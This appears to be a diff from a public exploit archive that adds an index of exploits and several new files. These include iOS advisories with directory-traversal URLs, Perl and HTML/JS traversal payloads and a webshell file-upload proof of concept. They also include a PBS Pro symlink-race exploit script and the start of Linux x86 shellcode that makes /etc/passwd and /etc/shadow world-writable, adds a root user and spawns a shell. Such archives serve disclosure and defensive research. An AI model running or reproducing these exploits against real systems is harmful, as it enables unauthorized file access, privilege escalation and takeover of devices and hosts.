33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
@ -30860,3 +30860,11 @@ id,file,description,date,author,platform,type,port
34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 'fImg' Parameter Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34260,platforms/php/webapps/34260.txt,"odCMS 1.07 'archive.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0
34262,platforms/linux/shellcode/34262.c,"Shellcode Linux x86 - chmod (777 /etc/passwd & /etc/shadow), Add New Root User (ALI/ALI) & Execute /bin/sh",2014-08-04,"Ali Razmjoo",linux,shellcode,0
34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-04,Vulnerability-Lab,ios,webapps,8080
34264,platforms/ios/webapps/34264.txt,"FreeDisk v1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080
34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 'slideshow.js.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34266,platforms/php/webapps/34266.txt,"RunCms 2.1 'check.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x 'pbs_mom' Insecure Temporary File Creation Vulnerability",2010-07-07,"Bartlomiej Balcerek",linux,local,0
34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 'install1.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0

Can't render this file because it is too large.

238
platforms/ios/webapps/34263.txt Executable file
View file

@ -0,0 +1,238 @@
Document Title:
===============
Video WiFi Transfer 1.01 - Directory Traversal Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1288
Release Date:
=============
2014-08-02
Vulnerability Laboratory ID (VL-ID):
====================================
1288
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Using this app, you can download videos to a PC or a smartphone from your iPhone through WiFi. The video downloaded can be played back
on PC and another smart phones as well as Mac and iPhone because the app converts it into a MP4 video. It only takes a few seconds for
the conversion. You would say it is the fastest. Just run the app on the iPhone and open the web browser on your PC or Android. That is
all that you are required to do. It is quite simple. In addition to the web browser, a ftp client application is also supported to
access the videos. Do not pay money for these functions as the app provides all of them without charging.
(Copy of the Homepage: https://itunes.apple.com/de/app/video-wifi-transfer-mp4-conversion/id892132370 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a Directory Traversal vulnerability in the official Bluefinger App Video WiFi Transfer/MP4 Conversion v1.01 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlueFinger Apps
Product: Video WiFi Transfer/MP4 Conversion - iOS Mobile Web Application 1.01
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official BlueFinger Apps Video WiFi Transfer v1.01 iOS mobile application.
The vulnerability allows remote attackers to bypass the path restriction of a service to access sensitive app-, web-server or -device information.
The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the wifi `web-server` module. The issue allows an attacker to bypass
the regular `folder/path` validation mechnism to access sensitive app web-server or iOS -device information. The attack vector of the issue is on
the application-side of the service and to perform malicious request the `GET method` is required to use.
After the start of the web-server by usage of the ftp function, the attacker is able to include 5 more path values (../../../../../) to access
unauthorized higher folders outside the mobile application service. In the analysis we saw that the path change of 5 directories is required
to bypass. During the tests we accessed the full app service folder and through the directory traversal to web-server configuration files but
also the parent device directory.
The security risk of the directory traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.7. Exploitation of the path traversal web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the directory traversal vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Directory
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Parent Directory (ftp://localhost:8080/)
Note: The structure of the software is the same like in the official BlueFinger Apps `Photo` WiFi Transfer v1.01 iOS mobile application.
The same vulnerability is located in both mobile ios software of the bluefinger apps company.
Proof of Concept (PoC):
=======================
The directory traversal web vulnerability can be exploited by attackers without privileged application user account and user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Exception:
50 /private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/video/../../etc/passwd No such file or directory.
Standard Request:
ftp://localhost:8080/../../Documents/
PoC: Links
ftp://localhost:8080/../../../../../../../../../../../../../../../../etc
ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/
ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/
ftp://localhost:8080/../../../../../../../../../../../../../../../../System/
Exploit: PoC (PL)
#!/usr/bin/perl
use LWP::Simple;
print "-------------------------------------------\n";
print "-= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal=-\n";
print "-------------------------------------------\n\n";
print "Target(ftp://localhost:8080/)\> ";
chomp($targ = <STDIN>);
print "Path: (/fn25/)\>";
chomp($path=<STDIN>);
$url = "../../../../../../../../etc/";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $page\n";
Exploit: PoC (HTML)
<html>
<head><body><title></title>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../etc>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../System/>
</body></head>
<html>
Exploit: PoC (JS)
<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3E%3C/title%3E%0A%3Ciframe%20src%3Dftp%3A//
localhost%3A8080/../../../../../../../../../../../../../../../../etc%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/
../../../../../../../../../../../../../../../../usr/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../
../../../../../../../../../../../Applications/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../../../
../../../../../../../../../System/%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>
--- PoC Console Logs ---
Applications 14.03.2014 19:06:00
Developer 18.08.2013 06:19:00
Library 20.10.2013 06:32:00
System 17.10.2013 08:08:00
bin 03.07.2014 18:13:00
cores 18.08.2013 05:56:00
Datei:etc 1 KB 20.10.2013 06:32:00
private 05.01.2014 22:18:00
sbin 03.07.2014 18:13:00
Datei:tmp 1 KB 20.10.2013 06:32:00
usr 20.10.2013 06:23:00
Datei:var 1 KB 20.10.2013 06:32:00
300: ftp://localhost:8080/../../../../../../../../
200: filename content-length last-modified file-type
201: "Applications" 0 Sun%2C%2014%20Mar%202014%2019%3A06%3A00 DIRECTORY
201: "Developer" 0 Sun%2C%2018%20Aug%202013%2006%3A19%3A00 DIRECTORY
201: "Library" 0 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 DIRECTORY
201: "System" 0 Sun%2C%2017%20Oct%202013%2008%3A08%3A00 DIRECTORY
201: "bin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY
201: "cores" 0 Sun%2C%2018%20Aug%202013%2005%3A56%3A00 DIRECTORY
201: "etc" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
201: "private" 0 Sun%2C%2005%20Jan%202014%2022%3A18%3A00 DIRECTORY
201: "sbin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY
201: "tmp" 15 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
201: "usr" 0 Sun%2C%2020%20Oct%202013%2006%3A23%3A00 DIRECTORY
201: "var" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
Note: The traversal becomes visible after the 5th path/folder request and affects like regular the full app path via web-server. (_eTiGb+6)
The issue is the same vulnerability like in the VL-ID 1286. The producer only changed the software name and converter to ensure that
video can be transfered then pictures.
Solution - Fix & Patch:
=======================
The directory traversal web vulnerability can be patched by a secure filter and restriction mechanism in the GET method request of the directory/path name value module.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the ftp service of the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

296
platforms/ios/webapps/34264.txt Executable file
View file

@ -0,0 +1,296 @@
Document Title:
===============
FreeDisk v1.01 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1287
Release Date:
=============
2014-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1287
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
Transfer files between your iPhone/iPod/iPad and your computers without iTunes! Just start FreeDisk, and your iDevice is automatically
turned into a wifi hard drive. You can then connect your iDevice to your computers, and use it as a regular hard drive, and easily
transfer files. No need for third part software, or iTunes, to finally exchange files between your iDevices and your computers!
FreeDisk can also turn your iDevice into an internet server to share your files with other smartphones (iOS, Android, Windows...) !
Last but not least, all your data are protected and can only be read when the app is running.
(Copy of the Homepage: https://itunes.apple.com/us/app/free-disk-turn-your-iphone/id896356251 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered multiple vulnerabilities in the official FreeDisk v1.01 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-08-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: FreeDisk - iOS Mobile Web Application 1.01
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official FreeDisk v1.01 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `uploadfile` POST method request to compromise the mobile web-application. The local file/path
include execution occcurs in the index `file list` context next to the vulnerable `filename` item value. The attacker is able to
inject the local malicious file request by usage of the available `wifi interface` upload form.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count
of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] FreeDisk v1.01
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official FreeDisk v1.01 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application file with elevated access rights.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.4.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] FreeDisk v1.01
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: LFI > FreeDisk App Index File Dir Listing (http://localhost:8080/)
/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNauWs741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr>
<td word-wrap="break-all" align="center">
<a href="<./[LOCAL FILE INCLUDE VULNERABILITY!].png"><./[LOCAL FILE INCLUDE VULNERABILITY!].png"></a></td></tr></table></td><td >
<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a href="IMG_0650.JPG">
<img src="data:image/png;
--- PoC Session Logs [POST] (LFI) ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[352481] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------17662256993564
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8080/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[317203]
Date[Do., 31 Juli 2014 13:38:34 GMT]
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: AFU > FreeDisk App Index File Dir Listing (http://localhost:8080/)
/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNau
Ws741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr><td word-wrap="break-all" align="center">
<a href="<./webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"><webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"></a></td></tr></table></td><td >
<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a href="IMG_0650.JPG">
<img src="data:image/png;
PoC: http://localhost:8080/webshell.png.jpg.html.js.jpg.png
--- PoC Session Logs [POST] (AFU) ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[359908] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3032116335563
Content-Disposition: form-data; name="file"; filename="webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8080/webshell.png.jpg.html.js.jpg.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[317203]
Date[Do., 31 Juli 2014 13:45:00 GMT]
Solution - Fix & Patch:
=======================
1.1
The file inlcude vulnerability can be patched by a secure parse and encode of the filename value in the upload file POST method request.
1.2
The arbitrary file upload issue can be fixed by a secure restriction and filter procedure in the filename type validation mechanism.
Restrict the input and check for extentions to prevent arbitrary file upload with further exploitation.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the file submit function is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

55
platforms/linux/local/34267.sh Executable file
View file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/41449/info
Altair Engineering PBS Pro creates temporary files in an insecure manner.
An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.
Versions prior to PBS Pro 10.4 are vulnerable.
#!/bin/bash
#set -x
# PBS Pro < 10.4 o+w race condition vulnerability Proof Of Concept by Bartlomiej Balcerek - bartol@pwr.wroc.pl
# Must be run on submitting host and will create /tmp/pbs_test_by_bartol file on exec host as a next job owner UID
echo Compiling racer...
cat << EOF | gcc -x c -o racer.x -
//repeatedly tries to create arbitrary choosen link
#include <unistd.h>
int main(int argc, char* argv[])
{
if (argc < 3) {printf("%s","Need 2 arguments!");exit(1);}
while (1) symlink(argv[1],argv[2]);
};
EOF
if [ ! -x racer.x ]; then echo "Cannot compile C code, do you have gcc installed ?" ;exit 1; fi
echo Submitting job...
jobname=`echo hostname | qsub -j oe -o out.txt`
sleep 2
host=`cat out.txt`
if [ -z $host ]; then echo "Cannot determine next execution host, is quere working ?"; exit 1;fi
rm out.txt
echo Next job will be run on $host
echo Copying racer to $host...
scp ./racer.x $host:/tmp
echo Calculating job id...
jobid=`echo $jobname | cut -d . -f 1`
jobid=$(($jobid+1))
if [ ! $jobid -ge 0 ]; then echo "Cannot determine next job ID!";exit 1;fi
echo Next job ID will be $jobid
hostname=`echo $jobname | cut -d . -f 2`
echo Running racer...submit job as different user, than push Ctrl+C after while.
ssh $host -- \(/tmp/racer.x /tmp/pbs_test_by_bartol /var/spool/pbs/spool/${jobid}.${hostname}.OU \)
ssh $host -- killall racer.x
echo /var/spool/pbs/spool on $host content:
ssh $host -- ls -latr /var/spool/pbs/spool
echo Cleaning up...
ssh $host -- unlink /var/spool/pbs/spool/${jobid}.${hostname}.OU
ssh $host -- ls -latr /var/spool/pbs/spool
ssh $host -- rm -v /tmp/racer.x
rm -v racer.x

144
platforms/linux/shellcode/34262.c Executable file
View file

@ -0,0 +1,144 @@
/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh
# Date: 4/8/2014
# Exploit Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
*/
/*
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
length: 378 bytes
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 6a 0f push $0xf
6: 58 pop %eax
7: 68 6a 73 77 64 push $0x6477736a
c: 5b pop %ebx
d: c1 eb 08 shr $0x8,%ebx
10: 53 push %ebx
11: 68 2f 70 61 73 push $0x7361702f
16: 68 2f 65 74 63 push $0x6374652f
1b: 89 e3 mov %esp,%ebx
1d: 68 41 41 ff 01 push $0x1ff4141
22: 59 pop %ecx
23: c1 e9 08 shr $0x8,%ecx
26: c1 e9 08 shr $0x8,%ecx
29: cd 80 int $0x80
2b: 6a 0f push $0xf
2d: 58 pop %eax
2e: 68 6a 64 6f 77 push $0x776f646a
33: 5b pop %ebx
34: c1 eb 08 shr $0x8,%ebx
37: 53 push %ebx
38: 68 2f 73 68 61 push $0x6168732f
3d: 68 2f 65 74 63 push $0x6374652f
42: 89 e3 mov %esp,%ebx
44: 68 41 41 ff 01 push $0x1ff4141
49: 59 pop %ecx
4a: c1 e9 08 shr $0x8,%ecx
4d: c1 e9 08 shr $0x8,%ecx
50: cd 80 int $0x80
52: 6a 05 push $0x5
54: 58 pop %eax
55: 68 41 73 77 64 push $0x64777341
5a: 5b pop %ebx
5b: c1 eb 08 shr $0x8,%ebx
5e: 53 push %ebx
5f: 68 2f 70 61 73 push $0x7361702f
64: 68 2f 65 74 63 push $0x6374652f
69: 89 e3 mov %esp,%ebx
6b: 68 41 41 01 04 push $0x4014141
70: 59 pop %ecx
71: c1 e9 08 shr $0x8,%ecx
74: c1 e9 08 shr $0x8,%ecx
77: cd 80 int $0x80
79: 89 c3 mov %eax,%ebx
7b: 6a 04 push $0x4
7d: 58 pop %eax
7e: 68 41 73 68 0a push $0xa687341
83: 59 pop %ecx
84: c1 e9 08 shr $0x8,%ecx
87: 51 push %ecx
88: 68 6e 2f 62 61 push $0x61622f6e
8d: 68 3a 2f 62 69 push $0x69622f3a
92: 68 72 6f 6f 74 push $0x746f6f72
97: 68 4c 49 3a 2f push $0x2f3a494c
9c: 68 3a 30 3a 41 push $0x413a303a
a1: 68 4b 2e 3a 30 push $0x303a2e4b
a6: 68 66 77 55 57 push $0x57557766
ab: 68 68 70 31 50 push $0x50317068
b0: 68 7a 59 65 41 push $0x4165597a
b5: 68 41 61 41 51 push $0x51416141
ba: 68 49 38 75 74 push $0x74753849
